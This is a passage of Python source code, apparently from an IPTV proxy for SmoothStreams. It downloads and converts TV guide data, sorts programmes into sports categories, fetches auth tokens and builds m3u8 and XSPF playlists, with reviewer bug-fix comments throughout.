            unzipped = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawepg.xml.gz')
        to_process.append([unzipped, "epg.xml", 'fog' if OVRXML == '' else 'ovr'])
        requests.urlretrieve("https://fast-guide.smoothstreams.tv/feed.xml",
                             os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawsports.xml'))
        unzippedsports = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawsports.xml')
        to_process.append([unzippedsports, "sports.xml", 'sstv'])
    else:
        logger.info("Downloading sstv epg")
        requests.urlretrieve("https://fast-guide.smoothstreams.tv/feed.xml",
                             os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawepg.xml'))
        unzipped = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawepg.xml')
        to_process.append([unzipped, "epg.xml", 'sstv'])
        to_process.append([unzipped, "sports.xml", 'sstv'])
    for process in to_process:
        # try to categorise the sports events
        try:
            if process[0].endswith('.gz'):
                opened = gzip.open(process[0])
            else:
                opened = open(process[0], encoding="UTF-8")
            tree = ET.parse(opened)
            changelist = {}
            # remove fogs xmltv channel names for readability in Plex Live
            if process[2] == 'fog':
                for a in tree.iterfind('channel'):
                    b = a.find('display-name')
                    newname = [chan_map[x].channum for x in range(len(chan_map) + 1) if
                               x != 0 and chan_map[x].epg == a.attrib['id'] and chan_map[x].channame == b.text]
                    if len(newname) > 1:
                        logger.debug("EPG rename conflict %s" % ",".join(newname))
                    # It's a list regardless of length so first item is always wanted.
                    newname = newname[0]
                    changelist[a.attrib['id']] = newname
                    a.attrib['id'] = newname
            for a in tree.iterfind('programme'):
                if process[2] == 'fog':
                    try:
                        a.attrib['channel'] = changelist[a.attrib['channel']]
                    except:
                        logger.info("A programme was skipped as it couldn't be assigned to a channel, refer log.")
                        # BUG FIX: the original passed the programme title as the
                        # logging format string; pass both values as lazy args.
                        logger.debug("%s %s", a.find('title').text, a.attrib)
                for b in a.findall('title'):
                    ET.SubElement(a, 'category')
                    c = a.find('category')
                    ep_num = a.find('episode-num')
                    # default category: episodic entries are series, the rest sports
                    if ep_num is not None:
                        c.text = "Series"
                    else:
                        c.text = "Sports"
                    # hoist the lower-cased title instead of recomputing it for
                    # every keyword test (and drop the duplicated 'nba' check)
                    title = b.text.lower()
                    if any(k in title for k in ('nba', 'ncaam')):
                        c.text = "Basketball"
                    elif any(k in title for k in ('nfl', 'football', 'american football', 'ncaaf', 'cfb')):
                        c.text = "Football"
                    elif any(k in title for k in ('epl', 'efl', 'soccer', 'ucl', 'mls', 'uefa', 'fifa', 'fc', 'la liga', 'serie a', 'wcq')):
                        c.text = "Soccer"
                    elif any(k in title for k in ('rugby', 'nrl', 'afl')):
                        c.text = "Rugby"
                    elif 'cricket' in title or 't20' in title:
                        c.text = "Cricket"
                    elif any(k in title for k in ('tennis', 'squash', 'atp')):
                        c.text = "Tennis/Squash"
                    elif any(k in title for k in ('f1', 'nascar', 'motogp', 'racing')):
                        c.text = "Motor Sport"
                    elif 'golf' in title or 'pga' in title:
                        c.text = "Golf"
                    elif any(k in title for k in ('boxing', 'mma', 'ufc', 'wrestling', 'wwe')):
                        c.text = "Martial Sports"
                    elif any(k in title for k in ('hockey', 'nhl', 'ice hockey')):
                        c.text = "Ice Hockey"
                    elif any(k in title for k in ('baseball', 'mlb', 'beisbol', 'minor league')):
                        c.text = "Baseball"
                    elif 'news' in title:
                        c.text = "News"
            tree.write(os.path.join(os.path.dirname(sys.argv[0]), 'cache', process[1]))
            logger.debug("writing to %s" % process[1])
            # add xml header to file for Kodi support
            with open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', process[1]), 'r+') as f:
                content = f.read()
                staticinfo = '''<channel id="static_refresh"><display-name lang="en">Static Refresh</display-name><icon src="http://speed.guide.smoothstreams.tv/assets/images/channels/150.png" /></channel><programme channel="static_refresh" start="20170118213000 +0000" stop="20201118233000 +0000"><title lang="us">Press to refresh rtmp channels</title><desc lang="en">Select this channel in order to refresh the RTMP playlist. Only use from the channels list and NOT the guide page. Required every 4hrs.</desc><category lang="us">Other</category><episode-num system="">1</episode-num></programme></tv>'''
                # content[:-5] drops the closing </tv> so the static channel can
                # be appended; staticinfo re-closes the document
                content = content[:-5] + staticinfo
                f.seek(0, 0)
                f.write('<?xml version="1.0" encoding="UTF-8"?>'.rstrip('\r\n') + content)
        except:
            logger.exception(process[0])
            if process[0] == "I:\\Video\\epg\\xmltv5.xml or URL":
                logger.info("Proxy failed to parse the example XMLTV provided by the EXAMPLE advancedsettings.json")
            else:
                logger.info("Proxy failed to parse the XMLTV from %s" % process[0])
# NOTE: started creating an EPG directly from the JSON guide, but it turned out not to be needed
def dl_sstv_epg():
    """Download the full sstv JSON guide and convert it to XMLTV via json2xml.

    Skips the download when cache/sstv_full.xml is newer than the most recent
    3-hourly UTC boundary.
    """
    # https://guide.smoothstreams.tv/feed-new-full-latest.zip
    if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'sstv_full.xml')):
        existing = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'sstv_full.xml')
        cur_utc_hr = datetime.utcnow().replace(microsecond=0, second=0, minute=0).hour
        target_utc_hr = (cur_utc_hr // 3) * 3
        target_utc_datetime = datetime.utcnow().replace(microsecond=0, second=0, minute=0, hour=target_utc_hr)
        logger.debug("utc time is: %s, utc target time is: %s, file time is: %s" % (
            datetime.utcnow(), target_utc_datetime, datetime.utcfromtimestamp(os.stat(existing).st_mtime)))
        if os.path.isfile(existing) and os.stat(existing).st_mtime > target_utc_datetime.timestamp():
            logger.debug("Skipping download of epg")
            return
    logger.debug("Downloading sstv epg")
    url = "https://guide.smoothstreams.tv/feed-new-full-latest.zip"
    import zipfile
    requests.urlretrieve(url, os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'testepg.zip'))
    # BUG FIX: close the archive deterministically instead of leaking the handle
    with zipfile.ZipFile(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'testepg.zip'), 'r') as archive:
        jsonepg = archive.read('feed-new-full.json')
    epg = json.loads(jsonepg.decode('utf-8'))
    json2xml(epg)
def json2xml(json_obj):
    """Convert the sstv full-guide JSON object into an XMLTV document and
    write it to cache/sstv_full.xml.

    json_obj: parsed feed-new-full.json; its 'data' mapping holds one entry
    per channel, each with a nested 'events' mapping of programmes.
    """
    master = ET.Element('tv')
    mtree = ET.ElementTree(master)
    data = json_obj.get('data')
    for i, j in data.items():
        displayname = j['name']
        # renamed from 'id' to avoid shadowing the builtin
        chan_num = j['number']
        icon = j['img']
        subelement = ET.SubElement(master, 'channel', {'id': chan_num})
        ET.SubElement(subelement, 'icon', {'src': icon})
        ET.SubElement(subelement, 'display-name')
        c = subelement.find('display-name')
        c.text = displayname
        # sample output target (from fog):
        # <programme channel="I58690.labs.zap2it.com" start="20180105170000 +0000" stop="20180105180000 +0000">
        # <title lang="en">NHL Hockey Central</title>
        # <desc lang="en">News and highlights from around the NHL.</desc>
        # <category lang="en">Ice Hockey</category>
        # <episode-num system="">EP02022073.0008</episode-num></programme>
        for event in j['events']:
            program = j['events'][event]
            # hoist the lower-cased title instead of recomputing it per keyword
            # (also drops the duplicated 'nba' check of the original)
            title = program['name'].lower()
            category = ""
            if 'nba' in title or 'ncaam' in title:
                category = "Basketball"
            elif any(k in title for k in ('nfl', 'football', 'american football', 'ncaaf', 'cfb')):
                category = "Football"
            elif any(k in title for k in ('epl', 'efl', 'soccer', 'ucl', 'mls', 'uefa', 'fifa', 'fc', 'la liga', 'serie a', 'wcq')):
                category = "Soccer"
            elif any(k in title for k in ('rugby', 'nrl', 'afl')):
                category = "Rugby"
            elif 'cricket' in title or 't20' in title:
                category = "Cricket"
            elif any(k in title for k in ('tennis', 'squash', 'atp')):
                category = "Tennis/Squash"
            elif any(k in title for k in ('f1', 'nascar', 'motogp', 'racing')):
                category = "Motor Sport"
            elif 'golf' in title or 'pga' in title:
                category = "Golf"
            elif any(k in title for k in ('boxing', 'mma', 'ufc', 'wrestling', 'wwe')):
                category = "Martial Sports"
            elif any(k in title for k in ('hockey', 'nhl', 'ice hockey')):
                category = "Ice Hockey"
            elif any(k in title for k in ('baseball', 'mlb', 'beisbol', 'minor league')):
                category = "Baseball"
            # times in the feed are unix epoch seconds; runtime is minutes
            start = datetime.utcfromtimestamp(int(program['time'])).strftime('%Y%m%d%H%M%S +0000')
            stop = datetime.utcfromtimestamp(int(program['time']) + 60 * int(program['runtime'])).strftime(
                '%Y%m%d%H%M%S +0000')
            # NOTE(review): XMLTV convention is a 'channel' attribute on
            # <programme>; this preserves the original's 'id' attribute --
            # confirm against downstream readers before changing.
            subelement = ET.SubElement(master, 'programme', {'id': chan_num, 'start': start, 'stop': stop})
            p_title = ET.SubElement(subelement, 'title', {'lang': program['language']})
            p_title.text = program['name']
            p_desc = ET.SubElement(subelement, 'desc', {'lang': program['language']})
            p_desc.text = program['description']
            p_genre = ET.SubElement(subelement, 'category', {'lang': program['language']})
            p_genre.text = category
    mtree.write(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'sstv_full.xml'))
    return
def getProgram(channel):
    """Return a programinfo record for what is airing on the given channel.

    Looks the channel up first in jsonGuide1 then jsonGuide2; the current
    time slot is the one containing "now" pushed GUIDELOOKAHEAD minutes
    ahead. Returns a default programinfo when no channel/slot matches.
    """
    global jsonGuide1, jsonGuide2
    # comparison point: local time shifted forward by the configured lookahead
    tmNow = time.localtime(time.time() + GUIDELOOKAHEAD * 60)
    # offset of the guide's publishing timezone (US Eastern) from UTC, seconds
    sched_offest = EST5EDT().utc_seconds()
    retVal = programinfo()
    # this machine's own UTC offset in seconds
    local_off = datetime.utcoffset(datetime.utcnow().replace(tzinfo=dt.timezone.utc).astimezone(tz=None)).total_seconds()
    if str(int(channel)) in jsonGuide1:
        oChannel = jsonGuide1[str(int(channel))]
        retVal.channel = channel
        # strip the leading "NN - " prefix from the channel name
        retVal.channelname = oChannel["name"].replace(format(channel, "02") + " - ", "").strip()
        for item in oChannel["items"]:
            # shift the published Eastern-time slot into local time before comparing
            startTime = time.localtime(time.mktime(datetime.strptime(item["time"], '%Y-%m-%d %H:%M:%S').timetuple()) - sched_offest + local_off)
            endTime = time.localtime(time.mktime(datetime.strptime(item["end_time"], '%Y-%m-%d %H:%M:%S').timetuple()) - sched_offest + local_off)
            if startTime < tmNow and endTime > tmNow:
                retVal.category = item["category"].strip()
                retVal.quality = item["quality"].upper()
                retVal.language = item["language"].upper()
                retVal.title = item["name"].strip()
                retVal.description = item["description"].strip()
                retVal.channel = channel
                retVal.startTime = startTime
                retVal.endTime = endTime
                retVal.timeRange = time.strftime("%H:%M", startTime) + "-" + time.strftime("%H:%M", endTime)
                return retVal
    if str(int(channel)) in jsonGuide2:
        oChannel = jsonGuide2[str(int(channel))]
        retVal.channel = channel
        retVal.channelname = oChannel["name"].replace(format(channel, "02") + " - ", "").strip()
        for item in oChannel["items"]:
            # NOTE(review): unlike the jsonGuide1 branch, no timezone shift is
            # applied here -- presumably this guide publishes local times; confirm.
            startTime = time.strptime(item["time"], '%Y-%m-%d %H:%M:%S')
            endTime = time.strptime(item["end_time"], '%Y-%m-%d %H:%M:%S')
            if startTime < tmNow and endTime > tmNow:
                retVal.category = item["category"].strip()
                retVal.quality = item["quality"].upper()
                retVal.language = item["language"].upper()
                retVal.title = item["name"].strip()
                retVal.description = item["description"].strip()
                retVal.channel = channel
                retVal.startTime = startTime
                retVal.endTime = endTime
                retVal.timeRange = time.strftime("%H:%M", startTime) + "-" + time.strftime("%H:%M", endTime)
                return retVal
    return retVal
def getJSON(sFile, sURL, sURL2):
    """Load JSON from a cache file when fresh (< 1 hour old), otherwise fetch
    it from sURL, falling back to sURL2, caching the response on success.

    Returns the parsed object, or an empty dict when every source fails.
    """
    # serve the cached copy when it is less than an hour old
    try:
        if os.path.isfile(sFile) and time.time() - os.stat(sFile).st_mtime < 3600:
            # BUG FIX: close the handle deterministically (the original leaked it)
            with open(sFile, 'r') as f:
                return json.loads(f.read())
    except:
        pass
    try:
        sJSON = urllib.request.urlopen(sURL).read().decode("utf-8")
        retVal = json.loads(sJSON)
    except:
        try:
            sJSON = urllib.request.urlopen(sURL2).read().decode("utf-8")
            retVal = json.loads(sJSON)
        except:
            return {}
    # best-effort cache write; a failure to cache is not fatal
    try:
        with open(sFile, "w+") as f:
            f.write(sJSON)
    except:
        pass
    return retVal
############################################################
# SSTV
############################################################
def get_auth_token(user, passwd, site):
    """Authenticate against the streaming site and store the returned hash
    token and its expiry in the module-level token dict.

    Returns early for 'vaders' (no token needed) or when the auth response
    lacks 'hash'/'valid'.
    """
    if site == 'vaders':
        baseUrl = "http://vapi.vaders.tv/vod/user?"
        # will return userinfo but not hash, hash is just user+pass hashed together, refer playlist generation
        return
    elif site == 'viewmmasr' or site == 'mmatv':
        baseUrl = 'https://www.mma-tv.net/loginForm.php?'
    else:
        baseUrl = 'https://auth.smoothstreams.tv/hash_api.php?'
    params = {
        "username": user,
        "password": passwd,
        "site": site
    }
    session = req.Session()
    url = baseUrl + urllib.parse.urlencode(params)
    try:
        data = session.post(url, params).json()
    except:
        # fall back to a plain urllib fetch
        # BUG FIX: the original decoded with the invalid codec name "utf--8",
        # which raises LookupError and kills this fallback path
        data = json.loads(requests.urlopen(url).read().decode("utf-8"))
    if 'hash' not in data or 'valid' not in data:
        logger.error("There was no hash auth token returned from auth.SmoothStreams.tv...")
        return
    else:
        token['hash'] = data['hash']
        # 'valid' is the token lifetime in minutes
        token['expires'] = (datetime.now() + timedelta(minutes=data['valid'])).strftime("%Y-%m-%d %H:%M:%S.%f")
        logger.info("Retrieved token %r, expires at %s", token['hash'], token['expires'])
        return
def check_token():
    """Ensure a valid auth token is loaded, fetching or renewing it as needed."""
    # vaders auth is handled per-request; there is no token to maintain
    if SITE == 'vaders':
        return
    if token['hash'] and token['expires']:
        # a token exists -- renew it only once it has expired
        expiry = datetime.strptime(token['expires'], "%Y-%m-%d %H:%M:%S.%f")
        if datetime.now() > expiry:
            logger.info("Token has expired, retrieving a new one...")
            get_auth_token(USER, PASS, SITE)
            dump_token()
    else:
        # nothing loaded yet -- fetch the first token
        logger.info("There was no token loaded, retrieving your first token...")
        get_auth_token(USER, PASS, SITE)
        dump_token()
def build_channel_map():
    """Fetch Fog's channels.json and build a {channel number: channelinfo} map."""
    chan_map = {}
    logger.debug("Loading channel list")
    url = 'https://fast-guide.smoothstreams.tv/altepg/channels.json'
    jsonChanList = json.loads(requests.urlopen(url).read().decode("utf-8"))
    for item in jsonChanList:
        retVal = channelinfo()
        oChannel = jsonChanList[item]
        retVal.channum = oChannel["channum"]
        channel = int(oChannel["channum"])
        # strip the leading "NN - " prefix from the channel name
        retVal.channame = oChannel["channame"].replace(format(channel, "02") + " - ", "").strip()
        if retVal.channame == 'Empty':
            retVal.channame = retVal.channum
        retVal.epg = oChannel["xmltvid"]
        # (dropped the original's dead chan_map[channel] = {} assignment,
        # which was immediately overwritten)
        chan_map[channel] = retVal
    logger.debug("Built channel map with %d channels", len(chan_map))
    return chan_map
def build_channel_map_sstv():
    """Fallback channel map built from the sstv feed-new.json guide."""
    chan_map = {}
    logger.debug("Loading channel list (fallback)")
    url = 'https://speed.guide.smoothstreams.tv/feed-new.json'
    jsonChanList = json.loads(requests.urlopen(url).read().decode("utf-8"))
    jsonEPG = jsonChanList['data']
    for item in jsonEPG:
        retVal = channelinfo()
        oChannel = jsonEPG[item]
        retVal.channum = oChannel["number"]
        channel = int(oChannel["number"])
        # strip the leading "NN - " prefix from the channel name
        retVal.channame = oChannel["name"].replace(format(channel, "02") + " - ", "").strip()
        if retVal.channame == 'Empty':
            retVal.channame = retVal.channum
        # the sstv feed has no xmltv ids, so the channel number doubles as the epg id
        retVal.epg = oChannel["number"]
        # (dropped the original's dead chan_map[channel] = {} assignment,
        # which was immediately overwritten)
        chan_map[channel] = retVal
    logger.debug("Built channel map with %d channels", len(chan_map))
    return chan_map
def build_playlist(host):
    """Build the standard dynamic m3u8 playlist from the channel map.

    Each entry proxies through this server, except for vaders where direct
    token-authenticated urls are emitted.
    """
    global chan_map
    dynamic_url = "{0}/playlist.m3u8?ch={1}&strm={2}&qual={3}"
    vaders_template = "http://vapi.vaders.tv/play/{0}.{1}?"
    new_playlist = "#EXTM3U x-tvg-url='%s/epg.xml'\n" % urljoin(host, SERVER_PATH)
    for pos in range(1, len(chan_map) + 1):
        try:
            if SITE == 'vaders':
                # vaders embeds base64-encoded credentials in the query string
                creds = json.dumps({"username": "vsmystreams_" + USER, "password": PASS})
                encoded = base64.b64encode(creds.encode('utf-8'))
                ext = 'ts' if STRM == 'mpegts' else 'm3u8'
                query = urllib.parse.urlencode({"token": str(encoded)[1:]})
                channel_url = vaders_template.format(vaders_channels[str(pos)], ext) + query
            else:
                channel_url = urljoin(host, dynamic_url.format(SERVER_PATH, chan_map[pos].channum, STRM, QUAL))
            new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="%s" tvg-logo="%s/%s/%s.png" channel-id="%s",%s\n' % (
                chan_map[pos].channum, chan_map[pos].channame, host, SERVER_PATH, chan_map[pos].channum,
                chan_map[pos].channum,
                chan_map[pos].channame)
            new_playlist += '%s\n' % channel_url
        except:
            logger.exception("Channel #%s failed. Channel missing from Fog's channels.json" % pos)
    logger.info("Built Dynamic playlist")
    return new_playlist
def build_xspf(host, request_file):
    """Build a VLC XSPF playlist of all channels, annotated with the current
    programme from the guide.

    Entries proxy through this server unless request_file contains 'static',
    in which case direct smoothstreams urls are emitted.
    """
    # standard dynamic playlist
    global chan_map
    xspfBodyTemplate = ('<?xml version="1.0" encoding="UTF-8"?>\n' +
                        '<playlist xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/" version="1">\n' +
                        '\t<title>Playlist</title>\n' +
                        '\t<trackList>\n' +
                        '{0}' +
                        '\t</trackList>\n' +
                        '\t<extension application="http://www.videolan.org/vlc/playlist/0">\n' +
                        '{1}' +
                        '\t</extension>\n' +
                        '</playlist>')
    # positional args: 0=album 3=title 5=location 6=trackNum 7=vlc id 8=creator 9=annotation
    xspfTrackTemplate = ('\t\t<track>\n' +
                         '\t\t\t<location>{5}</location>\n' +
                         '\t\t\t<title>{3}</title>\n' +
                         '\t\t\t<creator>{8}</creator>\n' +
                         '\t\t\t<album>{0}</album>\n' +
                         '\t\t\t<trackNum>{6}</trackNum>\n' +
                         '\t\t\t<annotation>{9}</annotation>\n' +
                         '\t\t\t<extension application="http://www.videolan.org/vlc/playlist/0">\n' +
                         '\t\t\t\t<vlc:id>{7}</vlc:id>\n' +
                         '\t\t\t</extension>\n' +
                         '\t\t</track>\n')
    xspfTrack2Template = '\t\t<vlc:item tid="{0}"/>\n'
    xspfTracks = ""
    xspfTracks2 = ""
    # build playlist using the data we have
    for pos in range(1, len(chan_map) + 1):
        # build channel url; programme metadata fills the track annotations
        program = getProgram(pos)
        url = "{0}/playlist.m3u8?ch={1}"
        vaders_url = "http://vapi.vaders.tv/play/{0}.{1}?"
        # quality label is informational only; channels above QUALLIMIT only offer 720p
        quality = '720p' if QUAL == '1' or pos > QUALLIMIT else '540p' if QUAL == '2' else '360p'
        if SITE == 'vaders':
            # vaders: direct url with base64-encoded credentials in the query
            tokenDict = {"username": "vsmystreams_" + USER, "password": PASS}
            jsonToken = json.dumps(tokenDict)
            tokens = base64.b64encode(jsonToken.encode('utf-8'))
            strm = 'ts' if STRM == 'mpegts' else 'm3u8'
            tokens = urllib.parse.urlencode({"token": str(tokens)[1:]})
            channel_url = vaders_url.format(vaders_channels[str(pos)], strm) + tokens
        else:
            urlformatted = url.format(SERVER_PATH, chan_map[pos].channum)
            template = '{0}://{1}.smoothstreams.tv:{2}/{3}/ch{4}q{5}.stream{6}?wmsAuthSign={7}'
            if not 'static' in request_file:
                # proxied url through this server
                channel_url = urljoin(host, urlformatted)
            else:
                # direct upstream url (hls over 443, rtmp over 3625)
                channel_url = template.format('https' if STRM == 'hls' else 'rtmp', SRVR, '443' if STRM == 'hls' else '3625',
                                              SITE, "{:02}".format(pos), QUAL if pos <= QUALLIMIT else '1',
                                              '/playlist.m3u8' if STRM == 'hls' else '', token['hash'])
        # build playlist entry
        try:
            xspfTracks += xspfTrackTemplate.format(escape(program.album), escape(program.quality),
                                                   escape(program.language), escape(program.title),
                                                   str(program.channel), channel_url,
                                                   str(int(chan_map[pos].channum)),
                                                   str(int(chan_map[pos].channum) -1 ),
                                                   escape(program.channelname), escape(program.description))
            # vlc:item tids are zero-based channel indices
            xspfTracks2 += xspfTrack2Template.format(str(int(chan_map[pos].channum) - 1))
        except:
            logger.exception("Exception while updating playlist: ")
    xspf = xspfBodyTemplate.format(xspfTracks, xspfTracks2)
    logger.debug("Built xspf playlist")
    return xspf
def build_static_playlist():
    """Build an m3u8 playlist of direct (non-proxied) smoothstreams urls."""
    global chan_map
    stream_template = '{0}://{1}.smoothstreams.tv:{2}/{3}/ch{4}q{5}.stream{6}?wmsAuthSign={7}'
    new_playlist = "#EXTM3U x-tvg-url='%s/epg.xml'\n" % urljoin(SERVER_HOST, SERVER_PATH)
    for pos in range(1, len(chan_map) + 1):
        # hls goes over https:443, rtmp over :3625; channels past QUALLIMIT only offer quality 1
        scheme = 'https' if STRM == 'hls' else 'rtmp'
        port = '443' if STRM == 'hls' else '3625'
        suffix = '/playlist.m3u8' if STRM == 'hls' else ''
        quality = QUAL if pos <= QUALLIMIT else '1'
        stream_url = stream_template.format(scheme, SRVR, port, SITE, "{:02}".format(pos), quality, suffix,
                                            token['hash'])
        try:
            new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="%s" tvg-logo="%s/%s/%s.png" channel-id="%s",%s\n' % (
                chan_map[pos].channum, chan_map[pos].channame, SERVER_HOST, SERVER_PATH, chan_map[pos].channum,
                chan_map[pos].channum,
                chan_map[pos].channame)
            new_playlist += '%s\n' % stream_url
        except:
            logger.exception("Exception while updating static playlist: ")
    logger.info("Built static playlist")
    return new_playlist
def build_test_playlist(hosts):
    """Build a diagnostic playlist: two direct static streams plus, for each
    host, one entry per proxy request type (redirect/file/variable/url)."""
    static_template = '{0}://{1}.smoothstreams.tv:{2}/{3}/ch{4}q{5}.stream{6}?wmsAuthSign={7}'
    proxied_template = "{0}/sstv/playlist.m3u8?ch=1&strm=hls&qual=1&type={1}"
    new_playlist = "#EXTM3U x-tvg-url='%s/epg.xml'\n" % urljoin(SERVER_HOST, SERVER_PATH)
    # fixed entries 1 and 2: direct HLS and RTMP streams for channel 1
    new_playlist += '#EXTINF:-1 tvg-id="1" tvg-name="Static HLS" channel-id="1","Static HLS"\n'
    new_playlist += '%s\n' % static_template.format('https', 'dnaw1', '443', SITE, "01", 1, '/playlist.m3u8', token['hash'])
    new_playlist += '#EXTINF:-1 tvg-id="2" tvg-name="Static RTMP" channel-id="2","Static RTMP"\n'
    new_playlist += '%s\n' % static_template.format('rtmp', 'dnaw1', '3625', SITE, "01", 1, '', token['hash'])
    count = 3
    for host in hosts:
        for label, req_type in (("Redirect", '1'), ("File", '2'), ("Variable", '3'), ("URL", '4')):
            new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="%s" channel-id="%s","%s"\n' % (count, label, count, label)
            new_playlist += '%s\n' % proxied_template.format(host, req_type)
            count += 1
    logger.info("Built static playlist")
    return new_playlist
def thread_playlist():
    """Background worker: rebuild the global dynamic playlist once per day."""
    global playlist
    while True:
        time.sleep(86400)
        logger.info("Updating playlist...")
        try:
            refreshed = build_playlist(SERVER_HOST)
            playlist = refreshed
            logger.info("Updated playlist!")
        except:
            logger.exception("Exception while updating playlist: ")
def create_channel_playlist(sanitized_channel, qual, strm, hash):
    """Fetch the upstream playlist for a channel and cache a rewritten copy.

    For hls: returns the playlist text with chunk references rewritten to
    absolute HTTPS urls. For rtmp: returns the rtmp stream url directly.
    """
    rtmpTemplate = 'rtmp://{0}.smoothstreams.tv:3625/{1}/ch{2}q{3}.stream?wmsAuthSign={4}'
    hlsTemplate = 'https://{0}.smoothstreams.tv:443/{1}/ch{2}q{3}.stream/playlist.m3u8?wmsAuthSign={4}=='
    hls_url = hlsTemplate.format(SRVR, SITE, sanitized_channel, qual, hash)
    rtmp_url = rtmpTemplate.format(SRVR, SITE, sanitized_channel, qual, hash)
    file = requests.urlopen(hls_url, timeout=2).read().decode("utf-8")
    if strm == 'hls':
        # Used to support HLS HTTPS requests: rewrite relative chunk
        # references to absolute urls
        template = 'https://{0}.smoothstreams.tv:443/{1}/ch{2}q{3}.stream/chunks'
        file = file.replace('chunks', template.format(SRVR, SITE, sanitized_channel, qual))
        # BUG FIX: open with 'w' (creates and truncates) -- the original
        # pre-created the file and wrote with 'r+', leaving stale trailing
        # content whenever the previous playlist was longer
        with open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'playlist.m3u8'), 'w') as f:
            f.write(file)
        return file
    else:
        # rtmp streams are handed straight to the player; no playlist rewrite
        # (dropped the original's unused template/file assignments here)
        return rtmp_url
def create_channel_file(url):
    """Fetch a stream playlist from url and cache a rewritten copy.

    For hls urls: returns the playlist text with chunk references made
    absolute. For rtmp urls: returns the url itself.
    """
    strm = 'hls'
    if url.startswith('rtmp'):
        strm = 'rtmp'
    file = requests.urlopen(url, timeout=2).read().decode("utf-8")
    if strm == 'hls':
        # rewrite relative chunk references to absolute urls derived from the
        # input url (everything up to 'playlist' plus 'chunks')
        template = find_between(url, '', 'playlist') + "chunks"
        file = file.replace('chunks', template)
        # open with 'w' so stale content from a longer previous playlist is truncated
        with open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'playlist.m3u8'), 'w') as f:
            f.write(file)
        return file
    else:
        # BUG FIX: the original referenced an undefined rtmp_url here
        # (guaranteed NameError); for rtmp the input url IS the stream url
        return url
def checkChannelURL(url):
    """Return True when url answers with HTTP 200, False on any failure."""
    try:
        resp = req.Session().get(url)
        if resp.status_code == 200:
            return True
        logger.debug("Exception on url %s with code %s" % (url, resp.status_code))
        return False
    except timeout:
        logger.debug("Timeout on url %s" % url)
        return False
    except:
        logger.debug("Exception on url %s" % url)
        return False
def fixURL(strm, ch, qual, hash):
    """Return a working stream url for the channel, probing the main server,
    the spare server, then every quality on both, before falling back to
    findChannelURL's full scan.
    """
    template = '{0}://{1}.smoothstreams.tv:{2}/{3}/ch{4}q{5}.stream{6}?wmsAuthSign={7}'
    # SRVR/QUAL are left as placeholders and substituted per probe below
    urlformatted = template.format('https' if strm == 'hls' else 'rtmp', 'SRVR', '443' if strm == 'hls' else '3625', SITE, "{:02}".format(int(ch)), 'QUAL', '/playlist.m3u8' if strm == 'hls' else '', hash)
    # NOTE(review): this first probe hard-codes quality 1 rather than using
    # the requested qual (the spare-server probe below does use qual) --
    # possibly intentional (q1 always exists), confirm before changing.
    if checkChannelURL(urlformatted.replace('SRVR',SRVR).replace('QUAL',str(1))):
        return urlformatted.replace('SRVR',SRVR).replace('QUAL',str(1))
    # Check spare
    if checkChannelURL(urlformatted.replace('SRVR',SRVR_SPARE).replace('QUAL',str(qual))):
        return urlformatted.replace('SRVR',SRVR_SPARE).replace('QUAL',str(qual))
    else:
        # Check other qualities
        for q in range(1,4):
            if checkChannelURL(urlformatted.replace('SRVR', SRVR).replace('QUAL', str(q))):
                return urlformatted.replace('SRVR', SRVR).replace('QUAL', str(q))
            elif checkChannelURL(urlformatted.replace('SRVR', SRVR_SPARE).replace('QUAL', str(q))):
                return urlformatted.replace('SRVR', SRVR_SPARE).replace('QUAL', str(q))
    # oh boy we're in trouble now
    return findChannelURL(input_url=urlformatted, qual=qual)
############################################################
# m3u8 merger
############################################################
def obtain_m3u8():
    """Load the extra external m3u8 (from EXTM3URL or EXTM3UFILE) and tag
    every channel entry with the EXTM3UNAME group-title.

    Returns the reformatted playlist text, or '' when none is configured.
    """
    formatted_m3u8 = ''
    url = EXTM3URL
    name = EXTM3UNAME
    file = EXTM3UFILE
    if url != '':
        logger.debug("extra m3u8 url")
        inputm3u8 = requests.urlopen(url).read().decode('utf-8')
        # drop the leading #EXTM3U header line
        inputm3u8 = inputm3u8.split("\n")[1:]
    elif file != '':
        logger.debug("extra m3u8 file")
        # BUG FIX: close the file handle (the original leaked it)
        with open(file, 'r') as f:
            inputm3u8 = f.readlines()
        inputm3u8 = [x.strip("\n") for x in inputm3u8[1:]]
    else:
        logger.debug("extra m3u8 nothing")
        return formatted_m3u8
    for i in range(len(inputm3u8)):
        # BUG FIX: the original tested with 'or', which is always true; 'and'
        # actually skips blank lines as intended
        if inputm3u8[i] != "" and inputm3u8[i] != "\n":
            try:
                if inputm3u8[i].startswith("#"):
                    # inject the group-title attribute into the EXTINF line
                    grouper = inputm3u8[i].split(',')
                    grouper = grouper[0] + ' group-title="%s"' % (name) + "," + grouper[1]
                    if i != 0:
                        formatted_m3u8 += "\n"
                    formatted_m3u8 += grouper
                else:
                    formatted_m3u8 += "\n" + inputm3u8[i]
            except:
                # BUG FIX: the original passed the line as a stray positional
                # arg with "skipped:" as the format string
                logger.debug("skipped: %s", inputm3u8[i])
    return formatted_m3u8
def obtain_epg():
    """Merge the configured external XMLTV feeds into cache/combined.xml,
    refreshing at most once per 3-hourly UTC boundary."""
    combined = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'combined.xml')
    if os.path.isfile(combined):
        cur_utc_hr = datetime.utcnow().replace(microsecond=0, second=0, minute=0).hour
        target_utc_hr = (cur_utc_hr // 3) * 3
        target_utc_datetime = datetime.utcnow().replace(microsecond=0, second=0, minute=0, hour=target_utc_hr)
        logger.debug("utc time is: %s, utc target time is: %s, file time is: %s" % (
            datetime.utcnow(), target_utc_datetime, datetime.utcfromtimestamp(os.stat(combined).st_mtime)))
